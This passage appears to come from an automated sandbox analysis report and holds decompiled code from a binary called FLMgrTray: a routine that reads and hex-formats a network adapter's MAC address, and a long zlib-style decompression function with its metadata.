                                                                                        				intOrPtr* _t61;
                                                                                        				unsigned int _t64;
                                                                                        				void* _t65;
                                                                                        				char* _t67;
                                                                                        				signed int _t69;
                                                                                        
                                                                                        				_t65 = __edi;
                                                                                        				_t51 = __ebx;
                                                                                        				_push(0xffffffff);
                                                                                        				_push(E0018D59B);
                                                                                        				_push( *[fs:0x0]);
                                                                                        				E00175EE0();
                                                                                        				_t37 =  *0x19d05c; // 0x2c80d730
                                                                                        				_t38 = _t37 ^ _t69;
                                                                                        				_v20 = _t38;
                                                                                        				_push(_t38);
                                                                                        				 *[fs:0x0] =  &_v16;
                                                                                        				_t67 = _a4;
                                                                                        				_v10472 = _t67;
                                                                                        				_v10452 = 0;
                                                                                        				_v10448 = 0xf;
                                                                                        				_v10468 = 0;
                                                                                        				_v8 = 0;
                                                                                        				_push( &_v10472);
                                                                                        				_t41 =  &_v10420;
                                                                                        				_v10472 = 0x2880;
                                                                                        				_push(_t41); // executed
                                                                                        				L0018C6B6(); // executed
                                                                                        				if(_t41 != 0) {
                                                                                        					L5:
                                                                                        					 *((intOrPtr*)(_t67 + 0x10)) = 0;
                                                                                        					 *((intOrPtr*)(_t67 + 0x14)) = 0xf;
                                                                                        					 *_t67 = 0;
                                                                                        				} else {
                                                                                        					_t44 =  &_v10420;
                                                                                        					while( *((intOrPtr*)(_t44 + 0x1a0)) != 6 ||  *((intOrPtr*)(_t44 + 0x190)) != 6) {
                                                                                        						_t44 =  *_t44;
                                                                                        						if(_t44 != 0) {
                                                                                        							continue;
                                                                                        						} else {
                                                                                        							goto L5;
                                                                                        						}
                                                                                        						goto L6;
                                                                                        					}
                                                                                        					_push( *(_t44 + 0x199) & 0x000000ff);
                                                                                        					_push( *(_t44 + 0x198) & 0x000000ff);
                                                                                        					_push( *(_t44 + 0x197) & 0x000000ff);
                                                                                        					_push( *(_t44 + 0x196) & 0x000000ff);
                                                                                        					_push( *(_t44 + 0x195) & 0x000000ff);
                                                                                        					E0016C3A0( *(_t44 + 0x195) & 0x000000ff,  &_v52, "%02x%02x%02x%02x%02x%02x",  *(_t44 + 0x194) & 0x000000ff);
                                                                                        					_t61 =  &_v52;
                                                                                        					_v10428 = 0;
                                                                                        					_v10424 = 0xf;
                                                                                        					_v10444 = 0;
                                                                                        					_t64 = _t61 + 1;
                                                                                        					do {
                                                                                        						_t48 =  *_t61;
                                                                                        						_t61 = _t61 + 1;
                                                                                        					} while (_t48 != 0);
                                                                                        					E00163450(_t51, _t64, _t65,  &_v52, _t61 - _t64);
                                                                                        					asm("movups xmm0, [ebp-0x28c8]");
                                                                                        					 *((intOrPtr*)(_t67 + 0x10)) = 0;
                                                                                        					 *((intOrPtr*)(_t67 + 0x14)) = 0;
                                                                                        					asm("movups [esi], xmm0");
                                                                                        					asm("movq xmm0, [ebp-0x28b8]");
                                                                                        					asm("movq [esi+0x10], xmm0");
                                                                                        				}
                                                                                        				L6:
                                                                                        				 *[fs:0x0] = _v16;
                                                                                        				return E001755F4(_v20 ^ _t69);
                                                                                        			}



























                                                                                        0x0016f500
                                                                                        0x0016f500
                                                                                        0x0016f503
                                                                                        0x0016f505
                                                                                        0x0016f510
                                                                                        0x0016f516
                                                                                        0x0016f51b
                                                                                        0x0016f520
                                                                                        0x0016f522
                                                                                        0x0016f526
                                                                                        0x0016f52a
                                                                                        0x0016f530
                                                                                        0x0016f533
                                                                                        0x0016f539
                                                                                        0x0016f543
                                                                                        0x0016f54d
                                                                                        0x0016f55a
                                                                                        0x0016f561
                                                                                        0x0016f562
                                                                                        0x0016f568
                                                                                        0x0016f572
                                                                                        0x0016f573
                                                                                        0x0016f57a
                                                                                        0x0016f59a
                                                                                        0x0016f59a
                                                                                        0x0016f5a1
                                                                                        0x0016f5a8
                                                                                        0x0016f57c
                                                                                        0x0016f57c
                                                                                        0x0016f582
                                                                                        0x0016f594
                                                                                        0x0016f598
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0016f598
                                                                                        0x0016f5ce
                                                                                        0x0016f5d6
                                                                                        0x0016f5de
                                                                                        0x0016f5e6
                                                                                        0x0016f5f5
                                                                                        0x0016f600
                                                                                        0x0016f605
                                                                                        0x0016f608
                                                                                        0x0016f615
                                                                                        0x0016f61f
                                                                                        0x0016f626
                                                                                        0x0016f630
                                                                                        0x0016f630
                                                                                        0x0016f632
                                                                                        0x0016f633
                                                                                        0x0016f644
                                                                                        0x0016f649
                                                                                        0x0016f650
                                                                                        0x0016f657
                                                                                        0x0016f65e
                                                                                        0x0016f661
                                                                                        0x0016f669
                                                                                        0x0016f669
                                                                                        0x0016f5ab
                                                                                        0x0016f5b0
                                                                                        0x0016f5c6

                                                                                        APIs
                                                                                        • GetAdaptersInfo.IPHLPAPI(?,?), ref: 0016F573
                                                                                        Strings
                                                                                        • %02x%02x%02x%02x%02x%02x, xrefs: 0016F5FA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: AdaptersInfo
                                                                                        • String ID: %02x%02x%02x%02x%02x%02x
                                                                                        • API String ID: 3177971545-1497811798
                                                                                        • Opcode ID: dacddfdef429df041ec66e2dda864a48fdb1b9fff568ba93e4d8f0bec1c967de
                                                                                        • Instruction ID: c0e4597a74c0c12909b0ee7c9da56c0099cb24839b27f6828c606bc5c8d55230
                                                                                        • Opcode Fuzzy Hash: dacddfdef429df041ec66e2dda864a48fdb1b9fff568ba93e4d8f0bec1c967de
                                                                                        • Instruction Fuzzy Hash: B141B2758052549EDB25DF54DC18BEABBF8FB09304F0442EEE48957281DB745A84CF60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 71%
                                                                                        			E00188470(void* __ebx, void* __esi, void* _a4, unsigned int _a8) {
                                                                                        				signed char _v5;
                                                                                        				signed int _v12;
                                                                                        				int _v16;
                                                                                        				signed int _v20;
                                                                                        				void* _v24;
                                                                                        				int _v28;
                                                                                        				signed int _v32;
                                                                                        				signed char _v33;
                                                                                        				signed char _v34;
                                                                                        				signed char _v35;
                                                                                        				signed char _v36;
                                                                                        				void* _v40;
                                                                                        				signed int _v44;
                                                                                        				signed int _v48;
                                                                                        				signed int _v52;
                                                                                        				signed int _v54;
                                                                                        				signed int _v56;
                                                                                        				signed int _v60;
                                                                                        				signed int _v64;
                                                                                        				signed int _v68;
                                                                                        				void* _t982;
                                                                                        				signed int _t983;
                                                                                        				signed int _t984;
                                                                                        				void* _t990;
                                                                                        				void* _t1028;
                                                                                        				signed int _t1029;
                                                                                        				int _t1035;
                                                                                        				intOrPtr* _t1054;
                                                                                        				signed int _t1055;
                                                                                        				void* _t1068;
                                                                                        				signed int _t1069;
                                                                                        				signed char* _t1071;
                                                                                        				void* _t1079;
                                                                                        				signed int _t1080;
                                                                                        
                                                                                        				_t1079 = __esi;
                                                                                        				_t1028 = __ebx;
                                                                                        				_t1054 = _a4;
                                                                                        				if(E00189F30(_t1054) != 0) {
                                                                                        					L368:
                                                                                        					return 0xfffffffe;
                                                                                        				} else {
                                                                                        					_t982 =  *((intOrPtr*)(_t1054 + 0xc));
                                                                                        					_v40 = _t982;
                                                                                        					if(_t982 == 0) {
                                                                                        						goto L368;
                                                                                        					} else {
                                                                                        						_t1068 =  *_t1054;
                                                                                        						_v24 = _t1068;
                                                                                        						if(_t1068 != 0 ||  *(_t1054 + 4) == _t1068) {
                                                                                        							_t1035 =  *((intOrPtr*)(_t1054 + 0x1c));
                                                                                        							_v16 = _t1035;
                                                                                        							_t983 =  *(_t1035 + 4);
                                                                                        							_v48 = _t983;
                                                                                        							if(_t983 == 0x3f3f) {
                                                                                        								 *(_t1035 + 4) = 0x3f40;
                                                                                        								_v40 =  *((intOrPtr*)(_t1054 + 0xc));
                                                                                        								_t983 = 0x3f40;
                                                                                        								_v24 =  *_t1054;
                                                                                        								_v48 = 0x3f40;
                                                                                        							}
                                                                                        							_t1069 =  *((intOrPtr*)(_t1054 + 0x10));
                                                                                        							_t984 = _t983 + 0xffffc0cc;
                                                                                        							_push(_t1028);
                                                                                        							_t1029 =  *(_t1054 + 4);
                                                                                        							_t1055 =  *(_t1035 + 0x3c);
                                                                                        							_v32 = _t1069;
                                                                                        							_v44 = _t1069;
                                                                                        							_v52 = 0;
                                                                                        							_t1071 = _v24;
                                                                                        							_v20 = _t1029;
                                                                                        							_v12 = _t1055;
                                                                                        							_v60 = _t1029;
                                                                                        							_push(_t1079);
                                                                                        							_t1080 =  *(_t1035 + 0x40);
                                                                                        							_v28 = _t1080;
                                                                                        							if(_t984 > 0x1e) {
                                                                                        								L272:
                                                                                        								return 0xfffffffe;
                                                                                        							} else {
                                                                                        								do {
                                                                                        									switch( *((intOrPtr*)(_t984 * 4 +  &M00189BC0))) {
                                                                                        										case 0:
                                                                                        											_t986 =  *(_t1035 + 0xc);
                                                                                        											_v64 = _t986;
                                                                                        											if(_t986 != 0) {
                                                                                        												__eflags = _t1080 - 0x10;
                                                                                        												if(_t1080 >= 0x10) {
                                                                                        													L15:
                                                                                        													__eflags = _t986 & 0x00000002;
                                                                                        													if((_t986 & 0x00000002) == 0) {
                                                                                        														L20:
                                                                                        														_t987 =  *(_t1035 + 0x24);
                                                                                        														 *(_t1035 + 0x14) = 0;
                                                                                        														__eflags = _t987;
                                                                                        														if(_t987 != 0) {
                                                                                        															 *(_t987 + 0x30) = 0xffffffff;
                                                                                        														}
                                                                                        														_t988 =  *(_t1035 + 0xc);
                                                                                        														__eflags = _t988 & 0x00000001;
                                                                                        														if((_t988 & 0x00000001) == 0) {
                                                                                        															L32:
                                                                                        															 *(_a4 + 0x18) = "incorrect header check";
                                                                                        															 *(_t1035 + 4) = 0x3f51;
                                                                                        														} else {
                                                                                        															_t993 = (_t1055 >> 8) + ((_t1055 & 0x000000ff) << 8);
                                                                                        															_t1035 = _v16;
                                                                                        															__eflags = _t993 % 0x1f;
                                                                                        															_t1055 = _v12;
                                                                                        															if(_t993 % 0x1f != 0) {
                                                                                        																goto L32;
                                                                                        															} else {
                                                                                        																__eflags = (_t1055 & 0x0000000f) - 8;
                                                                                        																if((_t1055 & 0x0000000f) == 8) {
                                                                                        																	_t67 = _t1035 + 0x28; // 0x8b0473ff
                                                                                        																	_t1073 =  *_t67;
                                                                                        																	_t1080 = _t1080 - 4;
                                                                                        																	_t1055 = _t1055 >> 4;
                                                                                        																	_v56 = _t1073;
                                                                                        																	_v12 = _t1055;
                                                                                        																	_t999 = (_t1055 & 0x0000000f) + 8;
                                                                                        																	_v28 = _t1080;
                                                                                        																	__eflags = _t1073;
                                                                                        																	_v64 = _t999;
                                                                                        																	_t1071 = _v24;
                                                                                        																	if(_t1073 == 0) {
                                                                                        																		 *(_t1035 + 0x28) = _t999;
                                                                                        																		_v56 = _t999;
                                                                                        																	}
                                                                                        																	__eflags = _t999 - 0xf;
                                                                                        																	if(_t999 > 0xf) {
                                                                                        																		L31:
                                                                                        																		 *(_a4 + 0x18) = "invalid window size";
                                                                                        																		 *(_t1035 + 4) = 0x3f51;
                                                                                        																	} else {
                                                                                        																		__eflags = _t999 - _v56;
                                                                                        																		if(_t999 > _v56) {
                                                                                        																			goto L31;
                                                                                        																		} else {
                                                                                        																			_push(0);
                                                                                        																			 *(_v16 + 0x18) = 1 << _v64;
                                                                                        																			_t1003 = E0018A060(0, 0);
                                                                                        																			_t1035 = _v16;
                                                                                        																			 *(_t1035 + 0x1c) = _t1003;
                                                                                        																			 *(_a4 + 0x30) = _t1003;
                                                                                        																			 *(_t1035 + 4) =  !(_v12 >> 8) & 0x00000002 | 0x00003f3d;
                                                                                        																			_t1055 = 0;
                                                                                        																			_t1080 = 0;
                                                                                        																			_v12 = 0;
                                                                                        																			_v28 = 0;
                                                                                        																		}
                                                                                        																	}
                                                                                        																} else {
                                                                                        																	goto L25;
                                                                                        																}
                                                                                        															}
                                                                                        														}
                                                                                        													} else {
                                                                                        														__eflags = _t1055 - 0x8b1f;
                                                                                        														if(_t1055 != 0x8b1f) {
                                                                                        															goto L20;
                                                                                        														} else {
                                                                                        															__eflags =  *(_t1035 + 0x28);
                                                                                        															if( *(_t1035 + 0x28) == 0) {
                                                                                        																 *(_t1035 + 0x28) = 0xf;
                                                                                        															}
                                                                                        															_push(0);
                                                                                        															_push(0);
                                                                                        															_t1005 = E0018BB60(0);
                                                                                        															_t1041 = _v16;
                                                                                        															_push(2);
                                                                                        															 *((intOrPtr*)(_t1041 + 0x1c)) = _t1005;
                                                                                        															_push( &_v36);
                                                                                        															_v36 = 0x8b1f;
                                                                                        															_t46 = _t1041 + 0x1c; // 0x10482bff
                                                                                        															_t1007 = E0018BB60( *_t46);
                                                                                        															_t1035 = _v16;
                                                                                        															_t1055 = 0;
                                                                                        															_t1080 = 0;
                                                                                        															_v12 = 0;
                                                                                        															_v28 = 0;
                                                                                        															 *(_t1035 + 0x1c) = _t1007;
                                                                                        															 *(_t1035 + 4) = 0x3f35;
                                                                                        														}
                                                                                        													}
                                                                                        													goto L271;
                                                                                        												} else {
                                                                                        													while(1) {
                                                                                        														__eflags = _t1029;
                                                                                        														if(_t1029 == 0) {
                                                                                        															goto L108;
                                                                                        														}
                                                                                        														_t1026 = ( *_t1071 & 0x000000ff) << _t1080;
                                                                                        														_t1080 = _t1080 + 8;
                                                                                        														_t1029 = _t1029 - 1;
                                                                                        														_v28 = _t1080;
                                                                                        														_t1055 = _t1055 + _t1026;
                                                                                        														_v20 = _t1029;
                                                                                        														_t1071 =  &(_t1071[1]);
                                                                                        														_v12 = _t1055;
                                                                                        														_v24 = _t1071;
                                                                                        														__eflags = _t1080 - 0x10;
                                                                                        														if(_t1080 < 0x10) {
                                                                                        															continue;
                                                                                        														} else {
                                                                                        															_t1035 = _v16;
                                                                                        															_t986 = _v64;
                                                                                        															goto L15;
                                                                                        														}
                                                                                        														goto L369;
                                                                                        													}
                                                                                        													goto L108;
                                                                                        												}
                                                                                        											} else {
                                                                                        												 *(_t1035 + 4) = 0x3f40;
                                                                                        												goto L271;
                                                                                        											}
                                                                                        											goto L369;
                                                                                        										case 1:
                                                                                        											__eflags = __esi - 0x10;
                                                                                        											if(__esi >= 0x10) {
                                                                                        												L38:
                                                                                        												 *(__ecx + 0x14) = __edx;
                                                                                        												__eflags = __dl - 8;
                                                                                        												if(__dl != 8) {
                                                                                        													L25:
                                                                                        													 *(_a4 + 0x18) = "unknown compression method";
                                                                                        													 *(_t1035 + 4) = 0x3f51;
                                                                                        													goto L271;
                                                                                        												} else {
                                                                                        													__eflags = __edx & 0x0000e000;
                                                                                        													if((__edx & 0x0000e000) == 0) {
                                                                                        														__esi =  *(__ecx + 0x24);
                                                                                        														__eax = __edx;
                                                                                        														__eax = __edx >> 8;
                                                                                        														_v56 = __edx;
                                                                                        														_v64 = __eax;
                                                                                        														__eflags = __esi;
                                                                                        														if(__esi != 0) {
                                                                                        															__eax = __eax & 0x00000001;
                                                                                        															__eflags = __eax;
                                                                                        															 *__esi = __eax;
                                                                                        															__eax =  *(__ecx + 0x14);
                                                                                        															_v56 =  *(__ecx + 0x14);
                                                                                        															__eax = _v64;
                                                                                        														}
                                                                                        														__eflags = _v56 & 0x00000200;
                                                                                        														if((_v56 & 0x00000200) != 0) {
                                                                                        															__eflags =  *(__ecx + 0xc) & 0x00000004;
                                                                                        															if(( *(__ecx + 0xc) & 0x00000004) != 0) {
                                                                                        																_v35 = __al;
                                                                                        																__eax =  &_v36;
                                                                                        																_push(2);
                                                                                        																_push( &_v36);
                                                                                        																_v36 = __dl;
                                                                                        																__eax = E0018BB60( *(__ecx + 0x1c));
                                                                                        																__ecx = _v16;
                                                                                        																 *(__ecx + 0x1c) = __eax;
                                                                                        															}
                                                                                        														}
                                                                                        														__edx = 0;
                                                                                        														 *(__ecx + 4) = 0x3f36;
                                                                                        														_v12 = 0;
                                                                                        														__esi = 0;
                                                                                        														goto L48;
                                                                                        													} else {
                                                                                        														__eax = _a4;
                                                                                        														 *(_a4 + 0x18) = "unknown header flags set";
                                                                                        														 *(__ecx + 4) = 0x3f51;
                                                                                        														goto L271;
                                                                                        													}
                                                                                        												}
                                                                                        											} else {
                                                                                        												asm("o16 nop [eax+eax]");
                                                                                        												while(1) {
                                                                                        													__eflags = __ebx;
                                                                                        													if(__ebx == 0) {
                                                                                        														goto L108;
                                                                                        													}
                                                                                        													__eax =  *__edi & 0x000000ff;
                                                                                        													__ecx = __esi;
                                                                                        													__eax = ( *__edi & 0x000000ff) << __cl;
                                                                                        													__esi = __esi + 8;
                                                                                        													__ebx = __ebx - 1;
                                                                                        													_v28 = __esi;
                                                                                        													__edx = __edx + (( *__edi & 0x000000ff) << __cl);
                                                                                        													_v20 = __ebx;
                                                                                        													__edi = __edi + 1;
                                                                                        													_v12 = __edx;
                                                                                        													_v24 = __edi;
                                                                                        													__eflags = __esi - 0x10;
                                                                                        													if(__esi < 0x10) {
                                                                                        														continue;
                                                                                        													} else {
                                                                                        														__ecx = _v16;
                                                                                        														goto L38;
                                                                                        													}
                                                                                        													goto L369;
                                                                                        												}
                                                                                        												goto L108;
                                                                                        											}
                                                                                        											goto L369;
                                                                                        										case 2:
                                                                                        											__eflags = __esi - 0x20;
                                                                                        											if(__esi >= 0x20) {
                                                                                        												L51:
                                                                                        												_t128 = __ecx + 0x24; // 0x5051ffff
                                                                                        												__eax =  *_t128;
                                                                                        												__eflags = __eax;
                                                                                        												if(__eax != 0) {
                                                                                        													 *(__eax + 4) = __edx;
                                                                                        												}
                                                                                        												__eflags =  *(__ecx + 0x14) & 0x00000200;
                                                                                        												if(( *(__ecx + 0x14) & 0x00000200) != 0) {
                                                                                        													__eflags =  *(__ecx + 0xc) & 0x00000004;
                                                                                        													if(( *(__ecx + 0xc) & 0x00000004) != 0) {
                                                                                        														__eax = __edx;
                                                                                        														_v36 = __dl;
                                                                                        														__eax = __edx >> 8;
                                                                                        														_v35 = __al;
                                                                                        														__edx = __edx >> 0x10;
                                                                                        														_v34 = __al;
                                                                                        														__eax =  &_v36;
                                                                                        														_push(4);
                                                                                        														__eflags = __edx;
                                                                                        														_push( &_v36);
                                                                                        														_v33 = __dl;
                                                                                        														_t141 = __ecx + 0x1c; // 0x10482bff
                                                                                        														__eax = E0018BB60( *_t141);
                                                                                        														__ecx = _v16;
                                                                                        														 *(__ecx + 0x1c) = __eax;
                                                                                        													}
                                                                                        												}
                                                                                        												__edx = 0;
                                                                                        												 *(__ecx + 4) = 0x3f37;
                                                                                        												_v12 = 0;
                                                                                        												__esi = 0;
                                                                                        												goto L58;
                                                                                        											} else {
                                                                                        												while(1) {
                                                                                        													L48:
                                                                                        													__eflags = __ebx;
                                                                                        													if(__ebx == 0) {
                                                                                        														goto L108;
                                                                                        													}
                                                                                        													__eax =  *__edi & 0x000000ff;
                                                                                        													__ecx = __esi;
                                                                                        													__eax = ( *__edi & 0x000000ff) << __cl;
                                                                                        													__ebx = __ebx - 1;
                                                                                        													__edx = __edx + (( *__edi & 0x000000ff) << __cl);
                                                                                        													_v20 = __ebx;
                                                                                        													__edi = __edi + 1;
                                                                                        													_v12 = __edx;
                                                                                        													__esi = __esi + 8;
                                                                                        													_v24 = __edi;
                                                                                        													__eflags = __esi - 0x20;
                                                                                        													if(__esi < 0x20) {
                                                                                        														continue;
                                                                                        													} else {
                                                                                        														__ecx = _v16;
                                                                                        														goto L51;
                                                                                        													}
                                                                                        													goto L369;
                                                                                        												}
                                                                                        												goto L108;
                                                                                        											}
                                                                                        											goto L369;
                                                                                        										case 3:
                                                                                        											__eflags = __esi - 0x10;
                                                                                        											if(__esi >= 0x10) {
                                                                                        												L61:
                                                                                        												_t150 = __ecx + 0x24; // 0x5051ffff
                                                                                        												__esi =  *_t150;
                                                                                        												_v56 = __edx >> 8;
                                                                                        												__eflags = __esi;
                                                                                        												if(__esi != 0) {
                                                                                        													__eax = __dl & 0x000000ff;
                                                                                        													 *(__esi + 8) = __dl & 0x000000ff;
                                                                                        													_t153 = __ecx + 0x24; // 0x5051ffff
                                                                                        													__eax =  *_t153;
                                                                                        													__esi = _v56;
                                                                                        													 *( *_t153 + 0xc) = __esi;
                                                                                        													__eax = __esi;
                                                                                        												}
                                                                                        												__eflags =  *(__ecx + 0x14) & 0x00000200;
                                                                                        												if(( *(__ecx + 0x14) & 0x00000200) != 0) {
                                                                                        													__eflags =  *(__ecx + 0xc) & 0x00000004;
                                                                                        													if(( *(__ecx + 0xc) & 0x00000004) != 0) {
                                                                                        														_v35 = __al;
                                                                                        														__eax =  &_v36;
                                                                                        														_push(2);
                                                                                        														_push( &_v36);
                                                                                        														_v36 = __dl;
                                                                                        														_t165 = __ecx + 0x1c; // 0x10482bff
                                                                                        														__eax = E0018BB60( *_t165);
                                                                                        														__ecx = _v16;
                                                                                        														 *(__ecx + 0x1c) = __eax;
                                                                                        													}
                                                                                        												}
                                                                                        												__edx = 0;
                                                                                        												 *(__ecx + 4) = 0x3f38;
                                                                                        												__esi = 0;
                                                                                        												__eflags = 0;
                                                                                        												_v12 = 0;
                                                                                        												_v28 = 0;
                                                                                        												goto L67;
                                                                                        											} else {
                                                                                        												while(1) {
                                                                                        													L58:
                                                                                        													__eflags = __ebx;
                                                                                        													if(__ebx == 0) {
                                                                                        														goto L108;
                                                                                        													}
                                                                                        													__eax =  *__edi & 0x000000ff;
                                                                                        													__ecx = __esi;
                                                                                        													__eax = ( *__edi & 0x000000ff) << __cl;
                                                                                        													__ebx = __ebx - 1;
                                                                                        													__edx = __edx + (( *__edi & 0x000000ff) << __cl);
                                                                                        													_v20 = __ebx;
                                                                                        													__edi = __edi + 1;
                                                                                        													_v12 = __edx;
                                                                                        													__esi = __esi + 8;
                                                                                        													_v24 = __edi;
                                                                                        													__eflags = __esi - 0x10;
                                                                                        													if(__esi < 0x10) {
                                                                                        														continue;
                                                                                        													} else {
                                                                                        														__ecx = _v16;
                                                                                        														goto L61;
                                                                                        													}
                                                                                        													goto L369;
                                                                                        												}
                                                                                        												goto L108;
                                                                                        											}
                                                                                        											goto L369;
                                                                                        										case 4:
                                                                                        											L67:
                                                                                        											__eflags =  *(__ecx + 0x14) & 0x00000400;
                                                                                        											if(( *(__ecx + 0x14) & 0x00000400) == 0) {
                                                                                        												_t195 = __ecx + 0x24; // 0x5051ffff
                                                                                        												__eax =  *_t195;
                                                                                        												__eflags = __eax;
                                                                                        												if(__eax != 0) {
                                                                                        													 *(__eax + 0x10) = 0;
                                                                                        												}
                                                                                        												goto L80;
                                                                                        											} else {
                                                                                        												__eflags = __esi - 0x10;
                                                                                        												if(__esi >= 0x10) {
                                                                                        													L72:
                                                                                        													_t178 = __ecx + 0x24; // 0x5051ffff
                                                                                        													__eax =  *_t178;
                                                                                        													 *(__ecx + 0x44) = __edx;
                                                                                        													__eflags = __eax;
                                                                                        													if(__eax != 0) {
                                                                                        														 *(__eax + 0x14) = __edx;
                                                                                        													}
                                                                                        													__eflags =  *(__ecx + 0x14) & 0x00000200;
                                                                                        													if(( *(__ecx + 0x14) & 0x00000200) != 0) {
                                                                                        														__eflags =  *(__ecx + 0xc) & 0x00000004;
                                                                                        														if(( *(__ecx + 0xc) & 0x00000004) != 0) {
                                                                                        															_v36 = __dl;
                                                                                        															__eax =  &_v36;
                                                                                        															_push(2);
                                                                                        															__eflags = __edx;
                                                                                        															_push( &_v36);
                                                                                        															_v35 = __dl;
                                                                                        															_t190 = __ecx + 0x1c; // 0x10482bff
                                                                                        															__eax = E0018BB60( *_t190);
                                                                                        															__ecx = _v16;
                                                                                        															 *(__ecx + 0x1c) = __eax;
                                                                                        														}
                                                                                        													}
                                                                                        													__esi = 0;
                                                                                        													_v12 = 0;
                                                                                        													_v28 = 0;
                                                                                        													L80:
                                                                                        													 *(__ecx + 4) = 0x3f39;
                                                                                        													goto L81;
                                                                                        												} else {
                                                                                        													while(1) {
                                                                                        														__eflags = __ebx;
                                                                                        														if(__ebx == 0) {
                                                                                        															goto L108;
                                                                                        														}
                                                                                        														__eax =  *__edi & 0x000000ff;
                                                                                        														__ecx = __esi;
                                                                                        														__eax = ( *__edi & 0x000000ff) << __cl;
                                                                                        														__ebx = __ebx - 1;
                                                                                        														__edx = __edx + (( *__edi & 0x000000ff) << __cl);
                                                                                        														_v20 = __ebx;
                                                                                        														__edi = __edi + 1;
                                                                                        														_v12 = __edx;
                                                                                        														__esi = __esi + 8;
                                                                                        														_v24 = __edi;
                                                                                        														__eflags = __esi - 0x10;
                                                                                        														if(__esi < 0x10) {
                                                                                        															continue;
                                                                                        														} else {
                                                                                        															__ecx = _v16;
                                                                                        															goto L72;
                                                                                        														}
                                                                                        														goto L369;
                                                                                        													}
                                                                                        													goto L108;
                                                                                        												}
                                                                                        											}
                                                                                        											goto L369;
                                                                                        										case 5:
                                                                                        											L81:
                                                                                        											_t198 = __ecx + 0x14; // 0xfff84d8d
                                                                                        											__eax =  *_t198;
                                                                                        											__eflags = __eax & 0x00000400;
                                                                                        											if((__eax & 0x00000400) == 0) {
                                                                                        												L94:
                                                                                        												 *(__ecx + 0x44) = 0;
                                                                                        												 *(__ecx + 4) = 0x3f3a;
                                                                                        												goto L95;
                                                                                        											} else {
                                                                                        												_t201 = __ecx + 0x44; // 0x98de8cd
                                                                                        												__edx =  *_t201;
                                                                                        												__eflags =  *(__ecx + 0x44) - __ebx;
                                                                                        												_v56 =  *_t201;
                                                                                        												__edx = __ebx;
                                                                                        												_t204 = __ecx + 0x44; // 0x98de8cd
                                                                                        												__edx =  <=  ?  *_t204 : __ebx;
                                                                                        												_v48 = __edx;
                                                                                        												__eflags = __edx;
                                                                                        												if(__edx != 0) {
                                                                                        													__eflags =  *(__ecx + 0x24);
                                                                                        													__edi = _v24;
                                                                                        													if( *(__ecx + 0x24) != 0) {
                                                                                        														_t208 = __ecx + 0x24; // 0x5051ffff
                                                                                        														__ebx =  *_t208;
                                                                                        														__ebx =  *( *_t208 + 0x10);
                                                                                        														__eflags = __ebx;
                                                                                        														_v24 = __ebx;
                                                                                        														__ebx = _v20;
                                                                                        														if(__eflags != 0) {
                                                                                        															_t212 = __ecx + 0x24; // 0x5051ffff
                                                                                        															__ecx =  *_t212;
                                                                                        															__eax =  *(__ecx + 0x14);
                                                                                        															__eax =  *(__ecx + 0x14) - _v56;
                                                                                        															__ecx =  *(__ecx + 0x18);
                                                                                        															_v56 = __eax;
                                                                                        															__eflags = __eax - __ecx;
                                                                                        															__eax = _v56;
                                                                                        															if(__eflags <= 0) {
                                                                                        																__ecx = __edx;
                                                                                        															} else {
                                                                                        																__ecx = __ecx - __eax;
                                                                                        															}
                                                                                        															__eax = __eax + _v24;
                                                                                        															__eflags = __eax;
                                                                                        															__eax = memcpy(__eax, __edi, __ecx);
                                                                                        															__ecx = _v16;
                                                                                        															__esp = __esp + 0xc;
                                                                                        															__edx = _v48;
                                                                                        															_t221 = __ecx + 0x14; // 0xfff84d8d
                                                                                        															__eax =  *_t221;
                                                                                        														}
                                                                                        													}
                                                                                        													__eflags = __eax & 0x00000200;
                                                                                        													if((__eax & 0x00000200) != 0) {
                                                                                        														__eflags =  *(__ecx + 0xc) & 0x00000004;
                                                                                        														if(( *(__ecx + 0xc) & 0x00000004) != 0) {
                                                                                        															_push(__edx);
                                                                                        															_push(__edi);
                                                                                        															_t227 = __ecx + 0x1c; // 0x10482bff
                                                                                        															__eax = E0018BB60( *_t227);
                                                                                        															__ecx = _v16;
                                                                                        															 *(__ecx + 0x1c) = __eax;
                                                                                        														}
                                                                                        													}
                                                                                        													__eax = _v48;
                                                                                        													__ebx = __ebx - __eax;
                                                                                        													__edi = __edi + __eax;
                                                                                        													_v20 = __ebx;
                                                                                        													_t232 = __ecx + 0x44;
                                                                                        													 *_t232 =  *(__ecx + 0x44) - __eax;
                                                                                        													__eflags =  *_t232;
                                                                                        													_v24 = __edi;
                                                                                        												}
                                                                                        												_t235 = __ecx + 0x44; // 0x98de8cd
                                                                                        												__eax =  *_t235;
                                                                                        												__eflags =  *_t235;
                                                                                        												if( *_t235 != 0) {
                                                                                        													goto L108;
                                                                                        												} else {
                                                                                        													goto L94;
                                                                                        												}
                                                                                        											}
                                                                                        											goto L369;
                                                                                        										case 6:
                                                                                        											L95:
                                                                                        											__eflags =  *(__ecx + 0x14) & 0x00000800;
                                                                                        											if(( *(__ecx + 0x14) & 0x00000800) == 0) {
                                                                                        												_t290 = __ecx + 0x24; // 0x5051ffff
                                                                                        												__eax =  *_t290;
                                                                                        												__eflags = __eax;
                                                                                        												if(__eax != 0) {
                                                                                        													 *(__eax + 0x1c) = 0;
                                                                                        												}
                                                                                        												goto L120;
                                                                                        											} else {
                                                                                        												__eflags = __ebx;
                                                                                        												if(__ebx == 0) {
                                                                                        													goto L108;
                                                                                        												} else {
                                                                                        													__edx = 0;
                                                                                        													__eflags = 0;
                                                                                        													while(1) {
                                                                                        														__al =  *(__edi + __edx);
                                                                                        														__edx = __edx + 1;
                                                                                        														_v5 = __al;
                                                                                        														_t243 = __ecx + 0x24; // 0x5051ffff
                                                                                        														__eax =  *_t243;
